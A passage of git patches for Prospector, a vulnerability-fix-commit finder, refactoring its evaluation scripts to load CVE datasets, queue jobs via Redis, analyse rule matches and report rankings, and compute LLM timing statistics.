print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") - elif not is_fix and not exists and position < 0: - skipped += 1 - # print( - # ",".join( - # results["not_reported"] - # | results["not_found"] - # | results["false_positive"] - # | results["low_confidence"] - # | results["medium_confidence"] - # | results["CVE_ID_IN_LINKED_ISSUE"] - # | results["CROSS_REFERENCE"] - # | results["CVE_ID_IN_MESSAGE"] - # ) - # ) - total = len(dataset) - skipped - rulescount = dict(sorted(rulescount.items())) - - plt.rcParams["figure.autolayout"] = True - plt.rcParams["savefig.dpi"] = 300 - sns.set_style("whitegrid") - colors = [ - ( - "#ffa600" - if id - in ( - "COMMIT_IN_REFERENCE", - "CROSS_REFERENCED_GH_LINK", - "CROSS_REFERENCED_JIRA_LINK", - "CVE_ID_IN_LINKED_ISSUE", - "CVE_ID_IN_MESSAGE", - ) - else "#003f5c" - ) - for id in rulescount.keys() - ] - ss = sns.barplot( - x=list(rulescount.keys()), - y=list(rulescount.values()), - palette=colors, - width=0.6, - ) - plt.xticks(rotation="vertical") - # ss.set_xscale("log", base=2) - # ss.set_xticks([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]) - # ss.set_xticklabels([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024], rot) - - # ss.set_xticks(range(0, 800, 100)) - ss.tick_params(axis="x", labelsize=8) - # plt.show() - plt.savefig("project-kb.png") - - for rule, count in rulescount.items(): - print(f"{rule}: {count}") - # missing_lookup_git(missing) - - # print(YEAR) - print() - total_check = sum([len(x) for x in results.values()]) - print(total_check) - # total_year = sum([len([x for x in y if YEAR in x]) for y in results.values()]) - for key, value in results.items(): - print(f"{key}: {len(value)} ({(len(value)/1315)*100:.2f}%)") - # print( - # f"{key}: {(len([x for x in value if YEAR in x]) / total_year) * 100:.2f}%" - # ) - - # total_check += len(value) - yearly_timestamps = {k: v for k, v in yearly_timestamps.items() if len(v) > 30} - # df = pd.DataFrame(dict([(k, pd.Series(v)) for k, v in timestamps.items()])) - - # ax = sns.violinplot(df, inner="box") - # plt.ylabel("Days") - # plt.show() - - # for key, value in timestamps.items(): - # print( - # f"{key}: mean={int(statistics.mean(value))} stdDev={int(statistics.stdev(value))}" - # ) - - # df = pd.DataFrame.from_dict(timestamps, orient="index") - - # sns.set(style="whitegrid") - # sns.violinplot(data=df) - - if total_check != total: - print("ERROR: Some CVEs are missing") - - return missing - - -def delete_missing_git(dataset_path): - dataset = load_dataset(dataset_path) - for itm in dataset[:500]: - repository = Git(itm[1], "/sapmnt/home/I586140/intern/gitcache") - existing = [] - for commit in itm[4].split(","): - raw = repository.get_commit(commit) - try: - raw.extract_timestamp() - existing.append(commit) - except Exception: - pass - if len(itm[4].split(",")) != len(existing): - if len(existing) > 0: - print( - f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{','.join(existing)};{itm[5]}" - ) - else: - print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") - - -def missing_lookup_git(missing: List[str]): - count = 0 - for itm in missing: - cve, repo, versions, _, commits, _ = itm.split(";") - repository = Git(repo, "/sapmnt/home/I586140/intern/gitcache") - # repository.clone() - - repo_tags_o = repository.get_tags() - repo_tags = get_possible_tags(repo_tags_o, versions) - if repo_tags[0] is None and repo_tags[1] is None: - continue - versions = versions.split(":") - print(f"{cve}") - - print(f"Vers: {versions}") - print(f"Tags: {repo_tags}") - existing = [] - flag = False - for commit in commits.split(","): - raw_commit = repository.get_commit(commit) - if raw_commit.exists(): - existing.append(commit) - - # if len(commits.split(",")) != len(existing): - # if len(existing) > 0: - # print(f"{cve};{repo};{versions};False;{','.join(existing)};") - # else: - # pass - # count += 1 - - try: - raw_commit.tags = raw_commit.find_tags() - - if repo_tags[0] in raw_commit.tags: - print( - repo + "/commit/" + raw_commit.id, - " - ", - "Vulnerable tag is fixed", - ) - elif ( - repo_tags[1] in raw_commit.tags - and repo_tags[0] not in raw_commit.tags - ): - commit_ts = raw_commit.get_timestamp() - next_tag_ts = repository.get_timestamp(repo_tags[1], "a") - prev_tag_ts = repository.get_timestamp(repo_tags[0], "a") - if prev_tag_ts < commit_ts < next_tag_ts: - print(repo + "/commit/" + raw_commit.id, " - ", "Weird") - print( - f"python client/cli/main.py {cve} --repository {repo} --version-interval {repo_tags[0]}:{repo_tags[1]}" - ) - else: - print("Commit timestamp is outside the time interval") - elif repo_tags[1] not in raw_commit.tags: - if not flag: - print("simola") - flag = True - print(repo + "/commit/" + raw_commit.id) - ttags = [t for t in raw_commit.tags if repo_tags[1][:3] == t[:3]] - print(ttags) - if raw_commit.tags == []: - print(repo + "/commit/" + raw_commit.id, " - ", "No tags") - except Exception: - print(repo + "/commit/" + raw_commit.id, " - ", "Commit not found") - - print("=====================================") - # print(f"Mismatch: {count}/{len(missing)}") - - -def sum_relevances(list_of_rules): - return sum([r["relevance"] for r in list_of_rules]) - - -def check_report_get_rules(dataset, cve, fixing_commits): - with open(f"{dataset}/{cve}.json", "r") as file: - data = json.load(file) - # not_fixing = [ - # commit - # for commit in data["commits"] - # if commit["commit_id"] not in fixing_commits - # ] - # if len(not_fixing) == 0: - # return [], 0, 0, 0 - # return ( - # [r["id"] for r in not_fixing[0]["matched_rules"]], - # 1, - # 1, - # not_fixing[0]["commit_id"], - # ) - for i, commit in enumerate(data["commits"]): - if commit["commit_id"] in fixing_commits: - return ( - [r["id"] for r in commit["matched_rules"]], - i + 1, - sum_relevances(commit["matched_rules"]), - commit["commit_id"], - ) - - if "twins" in commit: - for twin in commit["twins"]: - if twin[1] in fixing_commits: - return ( - [r["id"] for r in commit["matched_rules"]], - i + 1, - sum_relevances(commit["matched_rules"]), - commit["commit_id"], - ) - # return ( - # [r["id"] for r in commit["matched_rules"]], - # i + 1, - # sum_relevances(commit["matched_rules"]), - # commit["commit_id"], - # ) - return None, None, None, None - - -def check_report(dataset, cve, fixing_commits): - try: - with open(f"{dataset}/{cve}.json", "r") as file: - data = json.load(file) - adv_timestamp = int(data["advisory_record"]["published_timestamp"]) - # for i in data["advisory_record"]["references"]: - # if "commit::" not in i: - # print(i) - # adv_timestamp = get_reservation_date(cve) - if len(data["commits"]) == 0: - score_first = -1 - else: - score_first = sum_relevances(data["commits"][0]["matched_rules"]) - for index, commit in enumerate(data["commits"]): - score_next = -1 - if index > 0: - score_next = sum_relevances( - data["commits"][index - 1]["matched_rules"] - ) - if commit["commit_id"] in fixing_commits: - if index == 0: - score_first = -1 - - return ( - True, - has_certainty(commit["matched_rules"]), - commit["commit_id"], - True, - index, - [ - index + 1, - sum_relevances(commit["matched_rules"]), - score_first, - score_next, - ], - [r["id"] for r in commit["matched_rules"]], - ) - - if "twins" in commit: - for twin in commit["twins"]: - if twin[1] in fixing_commits: - if index == 0: - score_first = -1 - return ( - True, - has_certainty(commit["matched_rules"]), - commit["commit_id"], - True, - index, - [ - index + 1, - sum_relevances(commit["matched_rules"]), - score_first, - score_next, - ], - [r["id"] for r in commit["matched_rules"]], - ) - - for index, commit in enumerate(data["commits"]): - cert = has_certainty(commit["matched_rules"]) - if cert != 0: - return ( - False, - cert, - commit["commit_id"], - True, - index, - [ - sum_relevances(commit["matched_rules"]), - score_first, - -1, - ], - [r["id"] for r in commit["matched_rules"]], - ) - return ( - False, - 0, - True, - True, - -1, - None, - [], - ) - except FileNotFoundError: - # is_fix, has_certainty, commit_id, exists, index - return False, 0, None, False, -1, None, [] - - -def process_json_report(dataset, cve, commits): - out = [] - exists = True - try: - with open(f"{dataset}/{cve}/{cve}.json", "r") as file: - data = json.load(file) - processed_commits = {} - for i, commit in enumerate(data["commits"]): - processed_commits[commit["commit_id"]] = [ - sum_relevances(commit["matched_rules"]), - i + 1, - ] - if commit["commit_id"] in commits: - processed_commits.pop(commit["commit_id"]) - current = [ - cve, - i + 1, - sum_relevances(commit["matched_rules"]), - None, - None, - None, - ] - current[3] = len( - [k for k, v in processed_commits.items() if v[0] == current[2]] - ) - if i > 0: - current[4] = sum_relevances(data["commits"][0]["matched_rules"]) - r_next = 0 - for j in range(i, -1, -1): - r_next = sum_relevances(data["commits"][j]["matched_rules"]) - if r_next > current[2]: - current[5] = r_next - break - out = current - exists = True - break - except FileNotFoundError: - exists = False - return exists, out - - -def analyze_rules_usage(dataset_path: str, cve: str = ""): - dataset = load_dataset(dataset_path) - rules: Dict[str, int] = {} - commit_count = 0 - cve_count = 0 - for itm in dataset: - cve_count += 1 - with open(f"{dataset_path[:-4]}/{itm[0]}/{itm[0]}.json", "r") as file: - data = json.load(file) - for commit in data["commits"]: - commit_count += 1 - for rule in commit["matched_rules"]: - if rule["id"] in rules: - rules[rule["id"]] += 1 - else: - rules[rule["id"]] = 1 - - sorted_rules = { - k: v for k, v in sorted(rules.items(), key=lambda item: item[1], reverse=True) - } - print(f"\nTotal commits: {commit_count}") - print(f"Total cves: {cve_count}\n") - for k, v in sorted_rules.items(): - print(f"{k}: {v}") - - -def update_comparison_table(dataset): - data = load_dataset(dataset) - pass - - -def to_latex_table(): - data = load_dataset("results/scalco.csv") - for e in data: - print(f"{e[0]} & {e[1][19:]} & {e[5]} \\\\ \hline") - - -def is_real_version(text: str): - return bool(re.match(r"\d+\.(?:\d+\.*)*\d", text)) - - -VULN = ["version", "through", "versions"] - -FIXED = [ - "before", - "before release", - "before version", - "prior to", - "upgrade to", - "fixed in", - "fixed in version", - "fixed in release", - "to version", -] - - -def get_version_spacy(text: str, nlp): - doc = nlp(text) - relevant_sentences = {} - relevant_sentence = "" - fixed_version = "" - vulnerable_version = "" - for i in range(len(doc))[1:]: - if is_real_version(doc[i].text): - if doc[i - 1].text in FIXED: - relevant_sentence = doc[: i + 1] - fixed_version = doc[i].text - elif (doc[i - 2].text + " " + doc[i - 1].text) in FIXED: - relevant_sentence = doc[: i + 1] - fixed_version = doc[i].text - elif ( - doc[i - 3].text + " " + doc[i - 2].text + " " + doc[i - 1].text - ) in FIXED: - relevant_sentence = doc[: i + 1] - fixed_version = doc[i].text - else: - relevant_sentence = doc[: i + 1] - vulnerable_version = doc[i].text - return vulnerable_version, fixed_version - - -def check_advisory(cve, repository=None, nlp=None): - advisory = build_advisory_record( - cve, nvd_rest_endpoint="http://localhost:8000/nvd/vulnerabilities/" - ) - references = [urlparse(r).netloc for r in advisory.references] - return references - vuln = "None" - if len(advisory.versions.get("affected")): - vuln = advisory.versions.get("affected")[-1] - - fixed = "None" - if len(advisory.versions.get("fixed")): - fixed = advisory.versions.get("fixed")[-1] - - vuln2, fixed2 = get_version_spacy(advisory.description, nlp) - res = [advisory.cve_id, advisory.description] - if fixed == fixed2 and vuln == vuln2: - res.append(f"{vuln}:{fixed}") - if fixed == "None" and fixed2 != "": - res.append(f"{vuln}:{fixed2}") - if vuln == "None" and vuln2 != "": - res.append(f"{vuln2}:{fixed}") - if fixed != fixed2 and fixed2 != "" and fixed != "None": - res.append(f"{vuln}:{fixed}") - res.append(f"{vuln}:{fixed2}") - - if len(res) > 2: - res.append("***************************************") - print(advisory.cve_id) - return res - else: - res.append(f"{vuln}:{fixed}") - res.append("***************************************") - print(advisory.cve_id) - return res - - def parse_cli_args(args): parser = argparse.ArgumentParser(description="Prospector scripts") @@ -941,85 +96,6 @@ def mute(): sys.stdout = open(os.devnull, "w") -def parallel_execution(filename: str): - print("Executing in parallel") - print(os.getcwd()) - dataset = load_dataset("empirical_study/datasets/" + filename + ".csv") - inputs = [ - { - "vulnerability_id": cve[0], - "repository_url": cve[1], - "version_interval": cve[2], - "git_cache": "/sapmnt/home/I586140/intern/gitcache", - "limit_candidates": 2500, - "filename": filename, - "silent": True, - } - for cve in dataset - if not os.path.exists(f"empirical_study/datasets/{filename}/{cve[0]}.json") - ] - if len(inputs) == 0: - return True - try: - pool = multiprocessing.Pool(processes=4) - for _ in tqdm( - pool.imap_unordered(execute_prospector_wrapper, inputs), - total=len(inputs), - ): - pass - pool.close() - return True - except Exception: - pool.terminate() - return False - - -def execute_prospector_wrapper(kwargs): - filename = kwargs["filename"] - del kwargs["filename"] - r, a = prospector(**kwargs) - if r is not None: - generate_report(r, a, "json", f"empirical_study/datasets/{filename}/{a.cve_id}") - - -def execute_prospector(filename: str, cve: str = ""): - # dataset = load_dataset("empirical_study/datasets/" + filename + ".csv") - dataset = load_dataset(filename) - if len(cve) != 0: - dataset = [c for c in dataset if c[0] in cve] - - for cve in dataset[:10]: - if os.path.exists(f"empirical_study/datasets/{filename}/{cve[0]}.json"): - continue - print( - f"\n\n*********\n {cve[0]} ({dataset.index(cve)+1}/{len(dataset)})\n**********\n" - ) - start_time = time.time() - result, advisory = prospector( - vulnerability_id=cve[0], - repository_url=cve[1], - version_interval=cve[2], - # git_cache="/sapmnt/home/I586140/intern/gitcache", - # git_cache="/users/sach/gitcache", - limit_candidates=2000, - ) - - if result is not None and time.time() - start_time < 1900: - # result = result[:10] - # for r in result: - # r.relevance = 0 - # r.matched_rules = [] - # advisory.files = [] - # advisory.keywords = [] - # result.sort(key=lambda x: x.timestamp, reverse=False) - generate_report( - result, - advisory, - "json", - f"empirical_study/datasets/{filename}/{cve[0]}", - ) - - def list_dir_and_select_folder(): files = [file for file in os.listdir("datasets/") if "." not in file] for i, file in enumerate(files): diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py new file mode 100644 index 000000000..e69de29bb From edf08948b09ad9bb339d4003503a606470361ccc Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 15 Jul 2024 15:08:03 +0000 Subject: [PATCH 030/130] improves code --- prospector/evaluation/analyse.py | 3 +- prospector/evaluation/dispatch_jobs.py | 68 ++++++++++++++------------ prospector/evaluation/run_multiple.py | 4 +- prospector/evaluation/utils.py | 7 +++ 4 files changed, 49 insertions(+), 33 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index afff92596..f2a992293 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -9,7 +9,8 @@ from matplotlib import pyplot as plt from datamodel.advisory import build_advisory_record -from evaluation.dispatch_jobs import build_table_row, load_dataset +from evaluation.dispatch_jobs import build_table_row +from evaluation.utils import load_dataset def analyze_results_rules(dataset_path: str): diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index a90f7aee9..36bf8c8a7 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -12,6 +12,7 @@ from core.prospector import prospector from core.report import generate_report +from evaluation.utils import load_dataset from git.git import Git from git.version_to_tag import get_possible_tags from llm.llm_service import LLMService @@ -35,12 +36,6 @@ # for itm in dataset: -def load_dataset(path: str): - with open(path, "r") as file: - reader = csv.reader(file, delimiter=";") - return [row for row in reader if "CVE" in row[0] and row[3] != "True"] - - def get_full_commit_ids(dataset_path: str): dataset = load_dataset("empirical_study/datasets/" + dataset_path + ".csv") for itm in dataset: @@ -279,7 +274,7 @@ def execute_prospector_wrapper(kwargs): def execute_prospector(filename: str, cve: str = ""): dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") - dataset = dataset[:3] + dataset = dataset[:50] if len(cve) != 0: dataset = [c for c in dataset if c[0] in cve] @@ -291,12 +286,12 @@ def execute_prospector(filename: str, cve: str = ""): f"\n\n*********\n {cve[0]} ({dataset.index(cve)+1}/{len(dataset)})\n**********\n" ) - dispatch_job_and_generate_report( + dispatch_prospector_jobs( cve[0], cve[2], f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json" ) -def run_prospector(vuln_id, v_int, report_type: str, output_file): +def run_prospector_and_generate_report(vuln_id, v_int, report_type: str, output_file): """Call the prospector() and generate_report() functions. This also creates the LLMService singleton so that it is available in the context of the job. """ @@ -322,27 +317,40 @@ def run_prospector(vuln_id, v_int, report_type: str, output_file): return results, advisory_record -def dispatch_job_and_generate_report( - cve_id: str, version_interval: str, report_output_file: str -): - """Dispatches a job to the queue.""" - - # Send them to Prospector to run - with Connection(redis.from_url(redis_url)): - queue = Queue() - - job = Job.create( - run_prospector, - args=( - cve_id, - version_interval, - "json", - report_output_file, - ), - description="Prospector Job", - id=cve_id, +def dispatch_prospector_jobs(filename: str, selected_cves: str): + """Dispatches jobs to the queue.""" + + dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") + dataset = dataset[:50] + + # Only run a subset of CVEs if the user supplied a selected set + if len(selected_cves) != 0: + dataset = [c for c in dataset if c[0] in selected_cves] + + for cve in dataset: + if os.path.exists(f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json"): + continue + + print( + f"\n\n*********\n {cve[0]} ({dataset.index(cve)+1}/{len(dataset)})\n**********\n" ) - queue.enqueue_job(job) + # Send them to Prospector to run + with Connection(redis.from_url(redis_url)): + queue = Queue() + + job = Job.create( + run_prospector_and_generate_report, + args=( + cve[0], + cve[2], + "json", + f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json", + ), + description="Prospector Job", + id=cve[0], + ) + + queue.enqueue_job(job) - print(f"Dispatched job {cve_id} to queue.") + print(f"Dispatched job {cve[0]} to queue.") diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/run_multiple.py index b58013a6c..21759a69a 100644 --- a/prospector/evaluation/run_multiple.py +++ b/prospector/evaluation/run_multiple.py @@ -5,7 +5,7 @@ import sys from evaluation.analyse import analyze_prospector, analyze_results_rules -from evaluation.dispatch_jobs import execute_prospector, parallel_execution +from evaluation.dispatch_jobs import dispatch_prospector_jobs, parallel_execution def is_missing(path: str): @@ -79,7 +79,7 @@ def main(argv): if args.execute and not args.analyze and not args.parallel: # get_full_commit_ids(args.input) # return - execute_prospector(args.input, args.cve) + dispatch_prospector_jobs(args.input, args.cve) elif args.execute and not args.analyze and args.parallel: while not parallel_execution(args.input): pass diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index e69de29bb..418e8935a 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -0,0 +1,7 @@ +import csv + + +def load_dataset(path: str): + with open(path, "r") as file: + reader = csv.reader(file, delimiter=";") + return [row for row in reader if "CVE" in row[0] and row[3] != "True"] From 1c5803dd5d06d3c402ab8636ee5b1ef1cf39a7e3 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 15 Jul 2024 15:24:09 +0000 Subject: [PATCH 031/130] adds LLM generated docstrings to start understanding what's happening --- prospector/evaluation/analyse.py | 70 ++++++++++++++++++++++++++++++-- 1 file changed, 67 insertions(+), 3 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index f2a992293..0de4496e9 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -14,12 +14,19 @@ def analyze_results_rules(dataset_path: str): - print(dataset_path) + """This function analyses Prospector's rule application. It calculates the + frequency of each rule being matched across the dataset in `dataset_path`. + + It also generates a bar plot visualising the ferquency of each rule being + matched. + """ + print(f"Retrieving data from: {dataset_path}") dataset_path = "empirical_study/datasets/" + dataset_path + ".csv" dataset = load_dataset(dataset_path) - rules = {} - table = {} + + rules, table = {}, {} count = 0 + for itm in dataset: try: r, i, v, id = check_report_get_rules(dataset_path[:-4], itm[0], itm[4]) @@ -73,6 +80,7 @@ def analyze_results_rules(dataset_path: str): def analyze_prospector(filename: str): # noqa: C901 + """Analyses Prospector's reports.""" # delete_missing_git(dataset_path) # return [] filename = "empirical_study/datasets/" + filename + ".csv" @@ -332,10 +340,26 @@ def analyze_prospector(filename: str): # noqa: C901 def sum_relevances(list_of_rules): + """Calculates the sum of relevance scores for a list of matched rules.""" return sum([r["relevance"] for r in list_of_rules]) def check_report_get_rules(dataset, cve, fixing_commits): + """Retrieves the matched rules and commit information for a given CVE and a list of + fixing commits. + + Args: + dataset (str): The path to the dataset directory. + cve (str): The CVE identifier. + fixing_commits (list): A list of commit IDs that are fixing the vulnerability. + + Returns: + tuple: A tuple containing the following elements: + - A list of matched rule IDs + - The position (index) of the fixing commit in the list of commits + - The sum of relevance scores for the matched rules + - The commit ID of the fixing commit + """ with open(f"{dataset}/{cve}.json", "r") as file: data = json.load(file) # not_fixing = [ @@ -379,6 +403,7 @@ def check_report_get_rules(dataset, cve, fixing_commits): def has_certainty(rules: List[Dict]): + """Checks if a list of matched rules contains any strong (high-certainty) rules.""" if any(rule["id"] == "COMMIT_IN_REFERENCE" for rule in rules): return "COMMIT_IN_REFERENCE" if any(rule["id"] == "CVE_ID_IN_MESSAGE" for rule in rules): @@ -444,6 +469,23 @@ def get_non_fixing_commit_info(commit, index, score_first): def check_report(dataset, cve, fixing_commits): + """This function checks the report for a given CVE and list of fixing commits. + + Args: + dataset (str): The path to the dataset directory. + cve (str): The CVE identifier. + fixing_commits (list): A list of commit IDs that are fixing the vulnerability. + + Returns: + tuple: A tuple containing the following elements: + - A boolean indicating if the commit is a fixing commit + - The certainty level of the matched rules (a string or 0) + - The commit ID (or None if no commit is found) + - A boolean indicating if the commit exists + - The position (index) of the commit (-1 if no commit is found) + - A list containing the position, relevance score, score_first, and score_next (or None if no commit is found) + - A list of matched rule IDs + """ try: with open(f"{dataset}/{cve}.json", "r") as file: data = json.load(file) @@ -473,6 +515,24 @@ def check_report(dataset, cve, fixing_commits): def process_json_report(dataset, cve, commits): + """This function processes the JSON report for a given CVE and list of commits. + + Args: + dataset (str): The path to the dataset directory. + cve (str): The CVE identifier. + commits (list): A list of commit IDs. + + Returns: + tuple: A tuple containing the following elements: + - A boolean indicating if the commit exists + - A list containing the following elements: + - The CVE ID + - The position (index) of the commit + - The sum of relevance scores for the matched rules + - The number of commits with the same relevance score + - The sum of relevance scores for the first commit + - The sum of relevance scores for the next commit with a higher score + """ out = [] exists = True try: @@ -484,6 +544,7 @@ def process_json_report(dataset, cve, commits): sum_relevances(commit["matched_rules"]), i + 1, ] + if commit["commit_id"] in commits: processed_commits.pop(commit["commit_id"]) current = [ @@ -514,6 +575,7 @@ def process_json_report(dataset, cve, commits): def analyze_rules_usage(dataset_path: str, cve: str = ""): + """This function analyzes the usage of rules across a dataset.""" dataset = load_dataset(dataset_path) rules: Dict[str, int] = {} commit_count = 0 @@ -559,6 +621,7 @@ def is_real_version(text: str): def get_version_spacy(text: str, nlp): + """This function extracts vulnerable and fixed version numbers from a given text using spaCy.""" doc = nlp(text) # relevant_sentences = {} # relevant_sentence = "" @@ -584,6 +647,7 @@ def get_version_spacy(text: str, nlp): def check_advisory(cve, repository=None, nlp=None): + """This function checks the advisory for a given CVE and attempts to extract version information.""" advisory = build_advisory_record( cve, nvd_rest_endpoint="http://localhost:8000/nvd/vulnerabilities/" ) From aee608f8f0163db74578f79e94e7b554d7af95f1 Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 16 Jul 2024 08:30:17 +0000 Subject: [PATCH 032/130] adds function to analyse llm statistics across Prospector reports --- prospector/evaluation/analyse.py | 117 +++++++++++++++++++++++++++++-- 1 file changed, 112 insertions(+), 5 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 0de4496e9..91131878c 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -2,14 +2,18 @@ import json import re from collections import defaultdict -from typing import Dict, List +from typing import Dict, List, Tuple from urllib.parse import urlparse import seaborn as sns from matplotlib import pyplot as plt from datamodel.advisory import build_advisory_record -from evaluation.dispatch_jobs import build_table_row +from evaluation.dispatch_jobs import ( + INPUT_DATA_PATH, + PROSPECTOR_REPORT_PATH, + build_table_row, +) from evaluation.utils import load_dataset @@ -83,8 +87,8 @@ def analyze_prospector(filename: str): # noqa: C901 """Analyses Prospector's reports.""" # delete_missing_git(dataset_path) # return [] - filename = "empirical_study/datasets/" + filename + ".csv" - dataset = load_dataset(filename) + file = INPUT_DATA_PATH + filename + ".csv" + dataset = load_dataset(file) # res_ts = temp_load_reservation_dates(dataset_path[:-4] + "_timestamps.csv") missing = [] @@ -113,6 +117,7 @@ def analyze_prospector(filename: str): # noqa: C901 rulescount = defaultdict(lambda: 0) # references = list() + # For each CSV in the input dataset, check its report for itm in dataset: try: ( @@ -124,9 +129,10 @@ def analyze_prospector(filename: str): # noqa: C901 ranks, rules, ) = check_report( - filename[:-4], itm[0], itm[4] + PROSPECTOR_REPORT_PATH + filename, itm[0], itm[4] ) # ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS except FileNotFoundError: + print(f"No report for {itm[0]}") continue # year = itm[0].split("-")[1] @@ -682,3 +688,104 @@ def check_advisory(cve, repository=None, nlp=None): res.append("***************************************") print(advisory.cve_id) return res + + +def analyse_statistics(filename: str): # noqa: C901 + """Analyses the Statistics field in each Prospector report of the CVEs contained in `filename`. + + Args: + filename (str): The input CSV file containing CVE information with the following columns: + # ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS + This file must be present in the INPUT_DATA_PATH folder. + + Prints: + The average time taken for getting the repository URL, for applying the commit classification + one single time and for applying the commit classification for all X commits. + """ + file = INPUT_DATA_PATH + filename + ".csv" + dataset = load_dataset(file) + + missing = [] + skipped = 0 + + repo_times, cc_times, total_cc_times = [], [], [] + + # For each CSV in the input dataset, check its report + for itm in dataset: + # Each itm has ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS + filepath = PROSPECTOR_REPORT_PATH + filename + f"/{itm[0]}.json" + try: + repo_time, avg_cc_time, total_cc_time = process_llm_statistics(filepath) + + repo_times.append(repo_time) + cc_times.append(avg_cc_time) + total_cc_times.append(total_cc_time) + + except FileNotFoundError: + missing.append(itm[0]) + skipped += 1 + continue + + avg_repo_time = sum(repo_times) / len(repo_times) + avg_cc_time = sum(cc_times) / len(cc_times) + avg_total_cc_time = sum(total_cc_times) / len(total_cc_times) + + # How many commits was the commit classification rule applied to? + for itm in dataset: + filepath = PROSPECTOR_REPORT_PATH + filename + f"/{itm[0]}.json" + try: + cc_num_commits = get_cc_num_commits(filepath) + break + + except FileNotFoundError: + continue + + print( + # f"Found {len(dataset)} files in input dataset. \n{skipped} reports were missing: {missing}." + f"Found {len(dataset)} files in input dataset. \n{skipped} reports were missing." + ) + + print("\nIn these reports, the LLM invokation needed the following times:") + print(f"Average time to get repository URL: \t\t\t\t{avg_repo_time}") + print( + f"Average time to get commit classification (single request): \t{avg_cc_time}" + ) + print( + f"Average time to get commit classification (all {cc_num_commits} requests): \t{avg_total_cc_time}" + ) + + +def process_llm_statistics(filepath: str) -> Tuple[float, float, float]: + "Returns the LLM statistics saved in Prospector's JSON report." + with open(filepath, "r") as file: + data = json.load(file) + + llm_stats = data["processing_statistics"]["LLM"]["llm"]["llm_service"][ + "LLMService" + ] + + total_cc_time = sum(llm_stats["classify_commit"]["execution time"]) + + avg_cc_time = total_cc_time / len( + llm_stats["classify_commit"]["execution time"] + ) + + return ( + llm_stats["get_repository_url"]["execution time"][0], + avg_cc_time, + total_cc_time, + ) + + +def get_cc_num_commits(filepath): + """Returns how many commits the commit classification rule was applied to.""" + with open(filepath, "r") as file: + data = json.load(file) + + num = len( + data["processing_statistics"]["LLM"]["llm"]["llm_service"]["LLMService"][ + "classify_commit" + ]["execution time"] + ) + + return num From ba799b667abe82e33452d6849737c3198fa77597 Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 16 Jul 2024 08:30:43 +0000 Subject: [PATCH 033/130] adds CL argument for llm statistics evaluation --- prospector/evaluation/dispatch_jobs.py | 31 +++++++------------------- prospector/evaluation/run_multiple.py | 28 +++++++++++++++++++++-- 2 files changed, 34 insertions(+), 25 deletions(-) diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index 36bf8c8a7..f02697cb2 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -21,6 +21,7 @@ INPUT_DATA_PATH = "evaluation/data/input/" PROSPECTOR_REPORT_PATH = "evaluation/data/reports/" + # get the redis server url config = parse_config_file() # redis_url = config.redis_url @@ -272,25 +273,6 @@ def execute_prospector_wrapper(kwargs): generate_report(r, a, "json", f"empirical_study/datasets/{filename}/{a.cve_id}") -def execute_prospector(filename: str, cve: str = ""): - dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") - dataset = dataset[:50] - if len(cve) != 0: - dataset = [c for c in dataset if c[0] in cve] - - for cve in dataset: - if os.path.exists(f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json"): - continue - - print( - f"\n\n*********\n {cve[0]} ({dataset.index(cve)+1}/{len(dataset)})\n**********\n" - ) - - dispatch_prospector_jobs( - cve[0], cve[2], f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json" - ) - - def run_prospector_and_generate_report(vuln_id, v_int, report_type: str, output_file): """Call the prospector() and generate_report() functions. This also creates the LLMService singleton so that it is available in the context of the job. @@ -328,12 +310,13 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): dataset = [c for c in dataset if c[0] in selected_cves] for cve in dataset: + # Skip already existing reports if os.path.exists(f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json"): continue - print( - f"\n\n*********\n {cve[0]} ({dataset.index(cve)+1}/{len(dataset)})\n**********\n" - ) + # print( + # f"\n\n*********\n {cve[0]} ({dataset.index(cve)+1}/{len(dataset)})\n**********\n" + # ) # Send them to Prospector to run with Connection(redis.from_url(redis_url)): @@ -353,4 +336,6 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): queue.enqueue_job(job) - print(f"Dispatched job {cve[0]} to queue.") + # print(f"Dispatched job {cve[0]} to queue.") # Sanity Check + + print(f"Dispatched {len(dataset)} jobs.") diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/run_multiple.py index 21759a69a..2143fe4f1 100644 --- a/prospector/evaluation/run_multiple.py +++ b/prospector/evaluation/run_multiple.py @@ 